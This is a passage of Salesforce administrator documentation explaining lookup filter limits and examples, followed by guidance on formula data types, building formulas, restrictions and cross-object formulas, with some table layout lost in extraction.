◊ System fields that are always read only, such as Created By  and Modified By

◊ Relationship fields that support queues, such as Case Owner and Lead Owner

• Each object can have up to five active required lookup filters and an unlimited number of optional lookup filters. If you
reach the limit of required lookup filters for an object, create optional filters instead and use validation rules to enforce
your business rule when a user saves.

• Lookup filters on currency fields don't convert currencies. For example, if your organization uses multiple currencies and
a lookup filter criteria is Expected Revenue greater than 100000, the lookup shows all records with an
Expected Revenue field value greater than 100,000, regardless of the currency.

• You can’t use special date values, such as “Today” or “This Month,” in lookup filter criteria.
• You can’t delete fields that are referenced in an active lookup filter.
• You can’t change the field type of fields referenced by an active lookup filter.

Using Lookup Filters with Person Accounts

If your organization uses person accounts, note the following:

• Person Accounts don't support Contact filters; however, Person Accounts support Account filters. For example, if the
Account field has a dependent lookup filter that's added to a Person Account, dependent lookups are supported. If the
Contact field has a dependent lookup filter that's added to a Person Account, dependent lookups isn't supported.

• Lookup filter criteria on Account Name only apply to business accounts, not person accounts. For example, if your lookup
filter criteria is Account Name does not contain book, business accounts with “book” in the name, such as John’s
Bookstore, are not valid, but person accounts with “book” in the name, such as John Booker, are valid and appear in the
lookup dialog for the Account field. If you need to filter on the name for a person account, use the First Name or Last
Name fields instead.

• Use the Is Person Account field in your lookup filter criteria to restrict the valid values of a lookup field to one type
of account (either person accounts or business accounts). For example, to restrict a lookup to only person accounts, include
the following in your lookup filter criteria: Is Person Account equals True.
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• You can't package lookup filters that reference standard fields specific to person accounts, such as the Email and Title
fields.

See Also:
About Lookup Filters
About Dependent Lookups
Tip sheet: Creating Lookup Filters on Relationship Fields

Lookup Filter Examples

Available in: All Editions except for Database.com.

User Permissions Needed

"Customize Application"To define lookup filters:

Record Types in Lookup Filters

If the value of a relationship field should only consist of records with a particular record type, specify the record type in a
lookup filter. For example, if the Account Name field on opportunities should only have accounts with a Customer Account
custom record type, define the following lookup filter to restrict users to only creating or editing opportunities associated with
accounts that have a Customer Account record type, excluding accounts with Partner Account and Competitor Account record
types:

Filter Criteria
Account Name: Account Record Type equals value Customer Account

Custom Error Message
Account does not exist or is not a customer account.

Lookup Window Text
You can only associate customer accounts to an opportunity. Search results only
display customer accounts.

Record Status in Lookup Filters

If the value of a relationship field should only consist of records with particular status, specify the status in a lookup filter. For
example, consider a Job Application object with a relationship field that points to the Position object. If the relationship
field should only have open positions, define the following lookup filter to restrict users to only creating or editing job applications
for positions with the Status field set to Open:

Filter Criteria
Position: Status equals value Open

Custom Error Message
Position does not exist or is not an open position.
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Lookup Window Text
You can associate only open positions with job applications. Search results display
open positions only.

Profiles in Lookup Filters

When a business rule does not apply to users with every profile, use the Current User Profile global variable fields to
define lookup filters that only affect users with a particular profile.

For example, the following lookup filter on the Case object Account Name field restricts users with a “Domestic Sales” profile
to only creating or editing opportunities associated with accounts that have a billing country of “USA” while allowing other
users to associate opportunities with any account:

Filter Criteria

1. Current User Profile: Name equals value Domestic Sales
2. Account Name: Billing Country equals value USA
3. Current User Profile: Name not equal to value Domestic Sales

Filter Logic
(1 AND 2) OR 3

Custom Error Message
Account does not exist or the account billing country is not USA. Domestic sales
reps can only create opportunities for accounts in the United States.

Lookup Window Text
Search results show only United States accounts in the for domestic sales
representatives.

You can modify the above example to simultaneously restrict users with a “Global Sales” custom profile to only associating
opportunities to accounts with a non-US billing country:

Filter Criteria

1. Current User Profile: Name equals value Global Sales
2. Account Name: Billing Country not equal to value USA
3. Current User Profile: Name equals value Domestic Sales
4. Account Name: Billing Country equals value USA
5. Current User Profile: Name not equal to value Global Sales, Domestic Sales

Filter Logic
(1 AND 2) OR (3 AND 4) OR 5

Custom Error Message
Account does not exist or the account billing country is not in your sales area.
Sales reps can only create opportunities for accounts in their sales area.

Lookup Window Text
Search results only display accounts in your region.

Important:  If you do not include line 5 in the filter criteria, users who are not in Global Sales or Domestic Sales
cannot select or save any values on account records.
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Roles in Lookup Filters

When a business rule does not apply to users in every role, use the Current User Role global variable fields to define
lookup filters that only affect users with particular roles. For example, in a recruiting application that has a Position object
with a lookup field to a Compensation Package object, you can restrict users from editing or creating positions that have an
executive compensation plan unless they are executive administrators or vice presidents. To do this, define the following lookup
filter on the Position object Compensation Package Name field:

Filter Criteria

1. Current User Role: Name does not start with value VP
2. Current User Role: Name does not equal value Executive Administrator
3. Compensation Package: Plan Type does not equal value Executive
4. Current User Role: Name starts with value VP
5. Current User Role: Name equals value Executive Administrator

Filter Logic
((1 OR 2) AND 3) OR (4 OR 5)

Custom Error Message
The compensation plan does not exist, or you have selected an executive compensation
plan but do not have access to create executive positions.

Lookup Window Text
Search results only display compensation plans that are relevant to positions you
are allowed to create.

Important:  Include the condition you are testing and the opposite condition. In this example, lines 1, 2, and 3 of
the filter criteria ensure that users who are not VPs or Executive Administrators cannot select Executive compensation
plans, while lines 4 and 5 ensure that VPs and Executive Administrators can select Executive compensation plans.

Blank Values in Lookup Filters

Your lookup filter criteria might reference a field that users often leave blank. You can design your lookup filter criteria to
accept blank values by using the Add Filter Logic in the filter criteria to create an OR condition. For example, if you have a
Partner Contact custom field on opportunities, restrict the field to only allow contacts that are associated to an account
with a Partner Account record type, or private contacts not associated with any account.

Filter Criteria

1. Partner Contact: Account: Account Record Type equals value Partner Account

2. Partner Contact: Account: Account Name equals value

Filter Logic
1 OR 2

Custom Error Message
The partner contact must be associated with a partner account, or must be a private
contact.

Lookup Window Text
Search results only display contacts from partner accounts or your private contacts.
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User IDs in Lookup Filters

Using user IDs in optional lookup filters can significantly improve user efficiency by first showing lookup search dialog results
that are most relevant to the user while still allowing users to see all results if necessary. For example, on a lookup field to
accounts, you can create an optional lookup filter that restricts the search results to accounts that the user owns in the search
lookup dialog results. If the user is looking for an account that someone else owns, the user can remove the filter.

Filter Criteria
Current User: User ID equals Field Account: Owner ID

Lookup Window Text
By default, search results only display accounts you own. To search all accounts,
click “Show all results.”

Simple Dependent Lookups

If the value of a relationship field should depend on the value of another relationship field on the current record, specify the
field to field comparison in the criteria. For example, if the case Contact Name field should only have contacts associated
to the account specified in the case Account Name field, use the following lookup filter:

Filter Criteria
Contact Name: Account ID equals field Case: Account ID

Custom Error Message
Contact does not exist or is not associated to the case account.

Lookup Window Text
Search results only display contacts associated to the case account.

Note:  When comparing lookup fields in lookup filter criteria, Salesforce always uses the ID of the relationship field,
not the name.

Complex Lookup Filters and Dependent Lookups

Achieving complex business rules with lookup filters often involves combing your rules with filter logic and fields of various
types. For example, consider an app for booking conference rooms that has the following data model:

FieldsObject

Meeting • Meeting Name

• Office lookup to the Office object
• Projector Required checkbox
• Number of Participants number field
• Conference Room lookup to the Conference Room

object

Conference Room • Conference Room Name

• Has Projector checkbox
• Number of Seats Available number field
• Conference Room Location lookup to the Office

object
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Office • Office Name

The following lookup filter on the meeting Conference Room field restricts the valid values to conference rooms that have
a projector if the meeting requires one, as well as the necessary number of seats:

Filter Criteria

1. Meeting: Projector Required equals field Meeting Conference Room: Has Projector

2. Meeting: Projector Required equals value False
3. Conference Room: Number of Seats Available greater or equal field Meeting: Number

of Participants

Filter Logic
(1 OR 2) AND 3

Custom Error Message
Conference room not found or is insufficient for your meeting.

Lookup Window Text
Search results only display conference rooms that can support your meeting
requirements.

To refine the valid values even further, incorporate the office where the conference room is located:

Filter Criteria

1. Meeting: Projector Required equals field Meeting Conference Room: Has Projector

2. Meeting: Projector Required equals value False
3. Conference Room: Number of Seats Available greater than field Meeting: Number of

Participants

4. Meeting: Office equals Field Conference Room: Conference Room Location

Filter Logic
(1 OR 2) AND 3 AND 4

Custom Error Message
Conference room not found or is insufficient for your meeting.

Lookup Window Text
Search results only display conference rooms that can support your meeting
requirements.

See Also:
Notes on Lookup Filters
Tip sheet: Creating Lookup Filters on Relationship Fields
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USING FORMULAS

Formulas Overview
Available in: All Editions

Reports and Approvals are not available in Database.com

A formula is an algorithm that derives its value from other fields, expressions, or values. Formulas can help you automatically
calculate the value of a field based on other fields.

Many areas in Salesforce use formulas. Before you begin using formulas, review the differences in their uses:

To:Use Formulas for:

Define the criteria a record must meet to enter the approval process.Approval Processes

Define the criteria a record must meet to enter the approval step.Approval Steps

Define the criteria the lead or case must meet for it to be assigned.Assignment Rules for Leads
and Cases

Define the criteria a lead or case must meet to trigger an auto-response rule.Auto-Response Rules for Leads
and Cases

Specify criteria a case must meet for it to be escalated.Case Escalation Rules

Define the content for custom links and buttons.Custom Buttons and Links

Create custom formula fields that automatically calculate a value based on other values,
merge fields, or expressions. Users can view formula fields on record detail pages but can’t
see the underlying algorithm or edit the value of a formula field.

Custom Fields

Note: Custom formula fields are not available in Connect Offline, Web-to-Lead
forms, or Web-to-Case forms.

Automatically calculate additional totals based on existing report summaries using the values,
merge fields, or expressions you specify. Users can’t change these totals.

Custom Summary Formulas in
Reports

Verify that the data a user enters in a record meets the standards you specify before the user
can save the record. A validation rule can include a formula such as CloseDate >=
TODAY().

Data Validations

Apply a value to a custom field when a user creates a record. Use formulas to define a default
value such as TODAY() + 7.

Users can change a default value. Default field values can be based on a formula using values,
merge fields, or expressions you specify.

Default Field Values
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To:Use Formulas for:

Define the criteria that a case must meet to be escalated.Escalation Rules

Automatically calculate the value of a custom field using the values, merge fields, or
expressions you specify. Users can’t change the value of a formula field.

Formula Fields

Create custom summary formulas in your reports to calculate additional totals based on the
existing summaries in that report.

Reports

Define the content for s-controls.S-Controls

Prevent users from entering an invalid value in a standard or custom field. Validation rules
can be based on formulas and display an error message to users when the value they enter
is not valid.

Validation Rules

Automatically change the value of a field to a value you specify. The formula can include
other values, merge fields, or expressions. You can set field updates to occur as a result of a
workflow rule or an approval process.

Workflow Field Updates

Define the criteria a record must meet to trigger a workflow rule.Workflow Rules

Define the content for Visualforce pages.Visualforce Pages

Common Formula Processes

Custom
Summary
Formulas for
Reports

Field UpdatesWorkflow
Rules and
Approval
Processes

Validation
Rules

Formula FieldsDefault Field
Values

Report displayWorkflow or
approval process

Record saveRecord saveRecord displayRecord creationWhen are they
executed?

YesNot applicableNot applicableNot applicableYesNoRead only?

Yes, a limited
subset of
functions

YesYesYesYesYesCan include
functions?

YesNoNoNoYesNoCan specify null
handling?

NoYesYesYesYesNoCan include
references to
parent merge
fields?

See Also:
Elements of a Formula
Formula Data Types

3023

Formulas OverviewEnhancing Your Objects, Data, and Fields



Formula Data Types
The data type of a formula determines the type of data you expect returned from your formula. Review the following data
types.

DescriptionData Type

Returns a true or false value. The field appears as a checkbox in record detail pages and reports.
Use True for checked values and False for unchecked values.

Checkbox

Returns a number in currency format of up to 18 digits with a currency sign.Currency

Note: Salesforce uses the round half even tie-breaking rule for currency fields. For
example, 23.5 becomes 24, 22.5 becomes 22, −22.5 becomes −22, and −23.5 becomes
−24.

Returns data that represents a day on the calendar. The current date can be acquired by calling
the built-in function TODAY() in a formula. This data type is not available for custom summary
formulas in reports.

Date

Returns data that represents a moment in time. A date/time field includes the date and also
the time of day including hour, minutes, and seconds. You can insert the current date and time

Date/Time

in a formula using the NOW() function. This data type is not available for custom summary
formulas in reports.

Returns a positive or negative integer or decimal of up to 18 digits. Salesforce uses the round
half up tie-breaking rule for numbers in formula fields. For example, 12.345 becomes 12.35
and −12.345 becomes −12.35.

Number

Returns a number in percent format of up to 18 digits followed by a percent sign. Percent data
is stored as a decimal divided by 100, which means that 90% is equal to 0.90.

Percent

Returns a string of up to 3900 characters. To display text in addition to the formula output,
insert that text in quotes. Use the text data type for text, text area, URL, phone, email, address,
and auto-number fields. This data type isn’t available for custom summary formulas in reports.

Text

See Also:
Building Formulas

Elements of a Formula
A formula can contain references to the values of fields, operators, functions, literal values, or other formulas. Use any or all
of the elements in the following table to build a formula. For more details about building formulas, see Building Formulas.
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DescriptionElement Name

A text string or number you enter that is not calculated or
changed. For example, if you have a value that’s always

Literal Value

multiplied by 2% of an amount, your formula would contain
the literal value of 2% of that amount:
ROUND((Amount*0.02), 2)

This example contains every possible part of a formula:
• A function called ROUND used to return a number

rounded to a specified number of decimal places.
• A field reference called Amount.

• An operator, *, that tells the formula builder to multiply
the contents of the Amount field by the literal value, 0.02.

• A literal number, 0.02. Use the decimal value for all
percents. To include actual text in your formula, enclose
it in quotes.

• The last number 2 in this formula is the input required for
the ROUND function that determines the number of
decimal places to return.

Reference the value of another custom or standard field using
a merge field. The syntax for a merge field is field_name

Field Reference

for a standard field or field_name__c for a custom field.
The syntax for a merge field on a related object is
object_name__r.field_name. Use the Insert Field
button or the drop-down list to insert a merge field in your
formula where necessary.

A system-defined formula that can require input from you
and returns a value or values. For example, TODAY() does

Function

not require input but returns the current date. The
TEXT(value) function requires your percent, number, or
currency input and returns text.

A symbol that specifies the type of calculation to perform or
the order in which to do it. For example, the + symbol specifies

Operator

two values should be added. The open and close parentheses
specify which expressions you want evaluated first.

An annotation within a formula that begins with a forward
slash followed by an asterisk (/*). and concludes with an
asterisk followed by a forward slash (*/). For example,

/*This is a formula comment*/

Comment

Comments are ignored when processing a formula.
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DescriptionElement Name

Comments are useful for explaining specific parts of a formula
to anyone viewing the formula definition. For example:

AND(
/*competitor field is required, check to see
if field is empty */
LEN(Competitor__c) = 0,
/* rule only enforced for ABCD record types
*/
RecordType.Name = "ABCD Value",
/* checking for any closed status, allows
for additional closed picklist values in the
future */
CONTAINS(TEXT(StageName), "Closed")
)

You can also use comments to comment out sections of your
formula when debugging and checking the syntax to locate
errors in the formula.

Note:

• Nesting comments causes a syntax error. For
example, you cannot save a formula that has the
following:

/* /* comment */ */

• Commenting out a whole formula causes a syntax
error.

• Comments count against the character and byte
size limits in formulas.

See Also:
Building Formulas
Quick Reference Guide: Formula Fields
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Formulas: How Do I...

Available in: All Editions

Some How Do I's are not relevant to Database.com

User Permissions Needed

“View Setup and Configuration”To view formula field details:

“Customize Application”To create, change, or delete formula fields:

Common Math Calculations

• Add numbers?
• Convert text into a number?
• Divide numbers?
• Multiply numbers?
• Round numbers?
• Subtract numbers?

Common Text Functions

• Check if a field contains specified text?
• Check if a picklist field contains a specified value?
• Combine first and last names?
• Convert numbers into text?
• Create a hyperlink field?

Advanced Formulas

• Calculate Commission Amounts for Opportunities?
• Calculate a Contact’s Age?
• Set Up Round-Robin Assignment of Cases or Leads?
• Set Up Opportunity Discount Rounded?

Custom Summary Formulas for Reports

• Calculate the sum of all leads that have Email Opt Out and Do Not Call fields selected?
• Calculate the difference of all Amount fields and all Discounted Amount fields on opportunities?
• Calculate the average age of all opportunities?
• Calculate what percent of all opportunities are closed won?
• Calculate the number of active Salesforce users to the 2nd power for administration?
• Calculate the duration of all activities (minutes) times the number of records per 24 hours?
• Calculate the average percent margin on a product-by-product level across many opportunities?
• Calculate the percentage of one product compared to all products in closed opportunities?
• Calculate the change in revenue from opportunities between months?
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Cross-Object Formulas

• Display the Created By field from a parent object?
• Display a Percent field from a parent object?
• Display a text field from a parent object?
• Display a phone number field from a parent object?
• Display a picklist field from a parent object?
• Display a URL field from a parent object?

Building Formulas
Available in: All Editions

User Permissions Needed

“View Setup and Configuration”To view formula field details:

“Customize Application”To create, change, or delete formula fields:

Your custom formula fields require special attributes. To build your formula:

1. Begin building a formula field the same way you create a custom field. See Creating Custom Fields on page 2922.
2. Select the data type for the formula. Choose the appropriate data type for your formula based on the output of your

calculation. See Formula Data Types on page 3024.
3. Choose the number of decimal places for currency, number, or percent data types. This setting is ignored for currency

fields in multicurrency organizations. Instead, the Decimal Places for your currency setting apply.

Note: Salesforce uses the round half up tie-breaking rule for numbers in formula fields. For example, 12.345
becomes 12.35 and −12.345 becomes −12.35.

4. Click Next.
5. Build your formula:

a. If you are building a formula in the Advanced Formula tab or for approvals or rules, such as workflow, validation,
assignment, auto-response, or escalation, click Insert Field, choose a field, and click Insert.

To create a basic formula that passes specific Salesforce data, select the Simple Formula tab, choose the field type in
the Select Field Type drop-down list, and choose one of the fields listed in the Insert Field drop-down list.

Tip: Build cross-object formulas to span to related objects and reference merge fields on those objects.

b. To insert an operator, choose the appropriate operator icon from the Insert Operator drop-down list.
c. Optionally, click the Advanced Formula tab to use functions and view additional operators and merge fields. Functions

are prebuilt formulas that you can customize with your input parameters.
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d. To insert a function, double-click its name in the list, or select it and click Insert Selected Function. To filter the list
of functions, choose a category from the Functions drop-down list. Select a function and click Help on this function
to view a description and examples of formulas using that function.

e. Consider adding comments to your formula, especially if it is complicated. Comments must begin with a forward slash
followed by an asterisk (/*), and conclude with an asterisk followed by a forward slash (*/).

Comments are useful for explaining specific parts of a formula to anyone viewing the formula definition. For example:

AND(
/*competitor field is required, check to see if field is empty */
LEN(Competitor__c) = 0,
/* rule only enforced for ABCD record types */
RecordType.Name = "ABCD Value",
/* checking for any closed status, allows for additional closed picklist values in the
future */
CONTAINS(TEXT(StageName), "Closed")
)

You can also use comments to comment out sections of your formula when debugging and checking the syntax to locate
errors in the formula.

Note:

• Nesting comments causes a syntax error. For example, you cannot save a formula that has the following:

/* /* comment */ */

• Commenting out a whole formula causes a syntax error.
• Comments count against the character and byte size limits in formulas.

Note:  Formula fields can contain up to 3,900 characters, including spaces, return characters, and comments. If
your formula requires more characters, create separate formula fields and reference them in another formula field.
The maximum number of displayed characters after an evaluation of a formula expression is 1,300 characters.

6. To check your formula for errors, click Check Syntax.
7. Optionally, enter a description of the formula in the Description box.
8. If your formula references any number, currency, or percent fields, choose an option for handling blank fields. To give any

blank fields a zero value, choose Treat blank fields as zeros. To leave these fields blank, choose Treat blank
fields as blanks.

9. Click Next.
10. Set the field-level security to determine whether the field should be visible for specific profiles, and click Next.
11. Choose the page layouts that should display the field. The field is added as the last field in the first two-column section

on the page layout. For user custom fields, the field is automatically added to the bottom of the user detail page.
12. Click Save to finish or Save & New to create more custom fields.

Note:  Because formula fields are automatically calculated, they are read-only on record detail pages and do not update
last modified date fields. Formula fields are not visible on edit pages.

In account formulas, all business account fields are available as merge fields. However, account fields exclusive to
person accounts such as Birthdate and Email are not available.
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Formulas on Activities that use standard fields—either alone or in workflow rules—shouldn't be placed on both the
Task and Event pages. This is because both Tasks and Events are considered Activities. For instance, if a formula is
used on a standard field only available for Tasks, it will also mistakenly be pulled into Events.

See Also:
Elements of a Formula
Merge Fields for Formulas
Tips on Building Formulas
Formula Operators and Functions
Quick Reference Guide: Formula Fields

Tips on Building Formulas
• Default value formulas for a type of record can only reference fields for that type of record. However, formula fields and

formulas for approvals or rules, such as workflow, validation, assignment, auto-response, or escalation, for a type of record
can reference fields for that type of record as well as any records that are related through a lookup or master-detail
relationship. For example, a formula for a validation rule on opportunities can reference merge fields for accounts and
campaigns as well as opportunities, and a formula field on accounts can reference fields for cases.

• Formula fields that a user can see may reference fields that are hidden or read only using field-level security. If the formula
field contains sensitive information, use field-level security to hide it.

• You can add activity formula fields to task and event page layouts. Note that a task-related formula field on an event page
layout may not be useful. Likewise, event-related formula fields on task page layouts may not be useful.

• To determine if a record is a task or event, use the IsTask merge field. For example:

IF(IsTask, "This is a task", "This is an event")

• To reference the unique identifier for your Salesforce organization in a formula, insert the $Organization.Id  merge
field. This merge field can display anywhere formula fields can except in reports.

• Some merge fields display as radio buttons but function like picklist fields when referenced in a formula.

Use the values “Read,” “Edit,” and “None” in a formula when referencing:

◊ $UserRole.CaseAccessForAccountOwner

◊ $UserRole.OpportunityAccessForAccountOwner

◊ CaseAccessLevel (on Territory)

◊ OpportunityAccessLevel (on Territory)

Use the values “Read,” “Edit,” and “All” in a formula when referencing:

◊ AccountAccessLevel (on Territory)

• If you create a contacts formula field that references account merge fields, that field can be included in contact page layouts
but should not be included in person accounts page layouts. The formula field will display a value of #Error on the person
accounts page.
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Restrictions

• The following limits apply to formula fields:

◊ Character limit—Formula fields can contain up to 3,900 characters, including spaces, return characters, and comments.
If your formula requires more characters, create separate formula fields and reference them in another formula field.

Note:  The maximum number of displayed characters after an evaluation of a formula expression is 1,300
characters.

◊ Save size limit—Formula fields cannot exceed 4,000 bytes when saved. The save size differs from the number of
characters if you use multi-byte characters in your formula.

◊ Compile size limit—Formula fields cannot exceed 5,000 bytes when compiled. The compile size is the size of the
formula (in bytes) including all of the fields, values, and formulas it references. There is no direct correlation between
the compile size and the character limit. Some functions, such as TEXT, DATEVALUE, DATETIMEVALUE, and
DATE significantly increase the compile size.

• Long text area, encrypted, and Description fields are not available for use in formulas.
• The value of a field cannot depend on another formula that references it.
• Fields referenced in formulas cannot be deleted. Remove the field from the formula before deleting it.
• Task Due Date is not available for use in formulas.
• Campaign statistic fields cannot be referenced in formulas for field updates, approval processes, workflow rules, or validation

rules, but can be referenced in custom formula fields.

Working with Date and Date/Time Fields

• Dates and times are always calculated using the user’s time zone.
• Date and date/time fields cannot be used interchangeably. The name alone may not indicate if a field is a date or date/time.

For example, Created Date and Last Modified Date are date/time fields whereas Last Activity Date is a
date field. Use the DATEVALUE function to convert a date/time field into a date field.

Note: The Created Date and Last Modified Date fields display only the date, not the date and time.

• Use addition and subtraction operators with date or date/time fields to calculate duration. For example, subtract a date
from another date to calculate the number of days between the two. Likewise, you can subtract the date/time from another
date/time to get the number of days between the two in the form of a number. See NOW or TODAY for suggested use.

• Use addition and subtraction operators with numbers to return another date or date/time. For example, {!CreatedDate}
+ 5 calculates the date and time five days after a record’s created date. Note that the expression returns the same data type
as the one given; a date field plus or minus a number returns a date, and a date/time field plus or minus a number returns
a date/time.

• When calculating dates using fractions, Salesforce ignores any numbers beyond the decimal. For example:

TODAY() + 0.7 is the same as TODAY() + 0, which is today’s date

TODAY() + 1.7 is the same asTODAY() + 1, which is tomorrow’s date

TODAY() + (-1.8) is the same as TODAY() + (-1), which is yesterday’s date

• To calculate the value of two fractions first, group them within parentheses. For example:

TODAY() + 0.5 + 0.5 is the same as TODAY() + 0 + 0, which is today’s date

TODAY() + (0.5+0.5) is the same as TODAY() + 1, which is tomorrow’s date

• Years cannot be zero and must be between -4713 and 9999.
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Working with Text Fields

• Before using the HYPERLINK function, consider the differences between hyperlinks and custom links.

◊ Hyperlink formula fields are just like other custom fields that you can display in list views and reports.
◊ Custom links display on detail pages in a predefined section; hyperlink formula fields can display on a detail page

wherever you specify.
◊ Using custom links, you can specify display properties such as window position and opening in a separate popup position;

hyperlink formula fields open in a new browser window by default or you can specify a different target window or frame.
◊ Your formulas can reference custom links. Before deleting a custom link, make sure it is not referenced in a formula

field.
◊ Hyperlink formula fields that contain relative URLs to Salesforce pages, such as /rpt/reportwizard.jsp, can be

added to list views, reports, and related lists. However, use a complete URL, including the server name and https://,
in your hyperlink formula before adding it to a search layout. Note that formula fields are not available in search result
layouts.

• Before using the HYPERLINK function, consider these:

◊ Hyperlink formula fields open in a new browser window by default or you can specify a different target window or
frame.

◊ Hyperlink formula fields that contain relative URLs to Salesforce pages can be added to list views and related lists.
However, use a complete URL, including the server name and https://, in your hyperlink formula before adding it
to a search layout. Note that formula fields are not available in search result layouts.

• To insert text in your formula field, surround the text with quotation marks. For example, to display “CASE: 123,” use
this formula "CASE: "& CaseNumber__c.

• Use the backslash (\) character before a quote or backslash to insert it as a literal value in your output. For example,
"Trouble\\Case \"Ticket\": " in your formula displays Trouble\Case "Ticket": on detail pages.

Working with Number Fields

• Use the decimal version of a percent when working with percent fields in formulas. For example, IF(Probability
=1...) for 100% probability or IF(Probability =0.9...) for 90% probability.

• Reference auto-number fields as text fields in formulas.
• The output of your formula must be less than 19 digits.
• Formulas can contain a mix of numbers, percents, and currencies as in this example: AnnualRevenue /

NumberOfEmployees.
• Salesforce uses the round half up tie-breaking rule for numbers in formula fields. For example, 12.345 becomes 12.35 and

−12.345 becomes −12.35.

Referencing Record Types in Formulas

Reference record types in formulas if you want different workflow rules, validation rules, and lookup filters to apply to different
record types. For example, you can:

• Create a workflow rule on accounts that emails different teams depending on the account record type the user selects when
creating the account.

• Create a validation rule on opportunities that allows only members of the North American sales team to save opportunities
with the Domestic record type.

When possible, use RecordTypeId instead of RecordType.Name to reference a specific record type. While
RecordType.Name makes a formula more readable, you must update the formula if the name of the record type changes,
whereas the ID of a record type never changes. Also, RecordType.Name requires a cross-object reference to the record type,
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while RecordTypeId does not. However, if you are deploying formulas across organizations (for example, between sandbox
and production), use RecordType.Name because IDs are not the same across organizations.

Avoid using $RecordType in formulas, except in default value formulas. Instead, use the RecordType merge field (for
example, Account.RecordType.Name) or the RecordTypeId field on the object.

Working with Picklists and Multi-Select Picklists

• You can use special picklist fields in your formulas, such as IsEscalated for cases and IsWon for opportunities.
• Picklist fields can only be used in the following functions:

◊ ISPICKVAL—Compares the value of a picklist to a single value.
◊ CASE—Compares the value of a picklist to multiple values.
◊ TEXT—Converts a picklist value into a text value so that you can work with the value in functions that support text

value, such as CONTAINS. (Only available in formula fields, validation rules, and workflow field updates.)

• The TEXT function always returns picklist values in your organization's master language, not the language of the current
user.

• Multi-select picklist fields can only be used in the following functions:

◊ INCLUDES
◊ ISBLANK
◊ ISNULL
◊ ISCHANGED (Only in assignment rules, validation rules, workflow field updates, and workflow rules in which the

evaluation criteria is set to Evaluate the rule when a record is: created, and every time it’s edited)
◊ PRIORVALUE (Only in assignment rules, validation rules, workflow field updates, and workflow rules in which the

evaluation criteria is set to Evaluate the rule when a record is: created, and every time it’s edited)

See Also:
Building Formulas
Formula Errors

What Are Cross-Object Formulas?

Available in: All Editions

Cross-object formulas are formulas that span two related objects and reference merge fields on those objects. Cross-object
formulas can reference merge fields from a master (“parent”) object if an object is on the detail side of a master-detail relationship.
You can reference fields from objects that are up to 10 relationships away. Cross-object formulas are available anywhere
formulas are used except when creating default values.

Note:  If you create a formula that references a field on another object and display that formula in your page layout,
users can see the field on the object even if they don’t have access to that object record. For example, if you create a
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formula field on the Case object that references an account field, and display that formula field in the case page layout,
users can see this field even if they don’t have access to the account record.

See Also:
Building Formulas
Building Cross-Object Formulas in the Simple Formula Tab
Building Cross-Object Formulas in the Advanced Formula Tab

Building Cross-Object Formulas in the Simple Formula Tab

Available in: All Editions

User Permissions Needed

“Customize Application”To create or change cross-object formulas:

To create a cross-object formula when building a formula in the Simple Formula tab, enter the relationship names of the
objects to which you are spanning followed by the field you want to reference. Separate the relationship names of each object
and the field with periods.

For example, enter Contact.Account.Name to reference the Account Name for a contact associated with a case in a
formula field on the Case object. Be sure to use the relationship names of the objects, not the labels. Although the relationship
name is often the same as the object name, it is technically the field name of the relationship field.

To reference the parent account name from Account object, the syntax is Parent.Name, not Account.Name. When
referencing a custom object, add two underscores and the letter r to its name. For example, Position__r.title__c
references the Job Title field (title__c) on a Position custom object.

Note:  If you create a formula that references a field on another object and display that formula in your page layout,
users can see the field on the object even if they don’t have access to that object record. For example, if you create a
formula field on the Case object that references an account field, and display that formula field in the case page layout,
users can see this field even if they don’t have access to the account record.

See Also:
Building Cross-Object Formulas in the Advanced Formula Tab
What Are Cross-Object Formulas?
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Building Cross-Object Formulas in the Advanced Formula Tab

Available in: All Editions

User Permissions Needed

“Customize Application”To create or change cross-object formulas:

To create a cross-object formula when building a formula in the Advanced Formula tab or for approvals or rules, such as
workflow, validation, assignment, auto-response, or escalation rules, click Insert Field, then click the related object to list its
fields.  Related objects are denoted by a “>” sign.

Note:  If you create a formula that references a field on another object and display that formula in your page layout,
users can see the field on the object even if they don’t have access to that object record. For example, if you create a
formula field on the Case object that references an account field, and display that formula field in the case page layout,
users can see this field even if they don’t have access to the account record.

The value of the Profile.Name merge field differs depending on the context of the cross-object formula field that references
it. On detail pages, the value is the profile name, as expected; however, in list views and reports, the value is the internal value
of the associated profile instead.  If you use Profile.Name in a formula, use it within an OR function to ensure the formula
always returns the intended result. For example:

IF
(OR

(LastModifiedBy.Profile.Name = "Standard User", LastModifiedBy.Profile.Name =
"PT2"),

"Standard", "Not Standard")

None of the above applies to profile names referenced by the $Profile global variable.

See Also:
Building Cross-Object Formulas in the Simple Formula Tab
What Are Cross-Object Formulas?

Tips on Building Cross-Object Formulas

Available in: All Editions

• Cross-object formulas that reference currency fields convert the value to the currency of the record that contains the formula.

• Salesforce allows a maximum of 10 unique relationships per object in cross-object formulas. The limit is cumulative across
all formula fields, rules, and lookup filters. For example, if two different formulas on opportunities reference two different
fields of an associated account, only one unique relationship exists (from opportunities to accounts).

• You can’t reference cross-object formulas in roll-up summary fields.
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• In cross-object formulas, you can’t reference merge fields for objects related to activities. For example, merge fields for
contacts and accounts aren’t available in task and event formulas.

Using the Owner Field

Some objects support different object types for the Owner field, such as a User, Queue, or Calendar. On objects that support
this behavior, when creating a cross-object formula using Owner, you must be explicit about the owner type you’re referencing.

For example, if you need owner email and you don’t use queues, your formula would be Owner:User.Email. If you do use
queues, your formula could be

IF( ISBLANK( Owner:User.Id ), Owner:Queue.QueueEmail, Owner:User.Email )

Here’s how you would select Owner object fields on a Lead in the Advanced formula tab:

Note:

• Owner references aren’t supported in Visualforce pages. For example, on a page with Case as a controller, you
can’t include {!Case.Owner:User.FirstName}. However, you can include an existing spanning formula on
a Visualforce page. For example, if you have a custom text formula MyFormula__c on a Case with value
Owner:User.FirstName, you can include {!Case.MyFormula__c} on your Visualforce page.

• Owner references aren’t supported on the Queue object. For example, you can't reference
Owner:Queue.Owner.Email.

• If your formula has Owner:User.fieldname and Owner:Queue.fieldname, both of these count against the
limit of 10 unique relationships per object in cross-object formulas.

• On objects that don’t support Queues, User is implicit when referencing Owner. Your formula should be
Owner.fieldname, not Owner:User.fieldname.

Using Profile.Name

The value of the Profile.Name merge field differs depending on the context of the cross-object formula field that references
it. On detail pages, the value is the profile name, as expected; however, in list views and reports, the value is the internal value
of the associated profile instead.  If you use Profile.Name in a formula, use it within an OR function to ensure the formula
always returns the intended result. For example:

IF
(OR

(LastModifiedBy.Profile.Name = "Standard User", LastModifiedBy.Profile.Name =
"PT2"),

"Standard", "Not Standard")
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None of the above applies to profile names referenced by the $Profile global variable.

See Also:
Building Cross-Object Formulas in the Advanced Formula Tab
What Are Cross-Object Formulas?

Formula Operators and Functions
